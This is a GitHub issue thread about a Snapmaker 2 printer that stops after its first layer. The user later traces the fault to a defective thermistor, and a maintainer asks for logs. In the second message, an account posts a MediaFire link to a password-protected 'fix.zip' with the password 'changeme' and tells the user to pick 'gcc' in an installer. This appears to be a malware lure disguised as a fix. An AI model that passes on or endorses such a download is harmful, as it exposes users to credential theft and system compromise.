Snapmaker/Luban #2487: printer stops after printing first layer

rosveld11, 2024-08-26:
My SM 2 stops after printing the first layer, Z axis goes to top and and stops, won't Resume printing, I have installed latest firmware and updated Luban to the latest version..
What is the problem?

sunshinezxq, 2024-08-26:
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

rosveld11, 2024-08-26:
I am a novice on doing these things, Gould you explain a bit more.

rosveld11, 2024-08-27:
Thanks for your information but the termister was faulty.

xiwai2, 2024-09-26:
@rosveld11 Hello, I hope you can provide us with the following information for judgment: 1. The machine video when this problem occurs, provide FW Log and SC Log (exported from the screen settings), and the Gcode file where the problem occurs in the operation, thank you!

rosveld11, 2024-09-26:
Thanks for contacting me, the problem was a defect thermister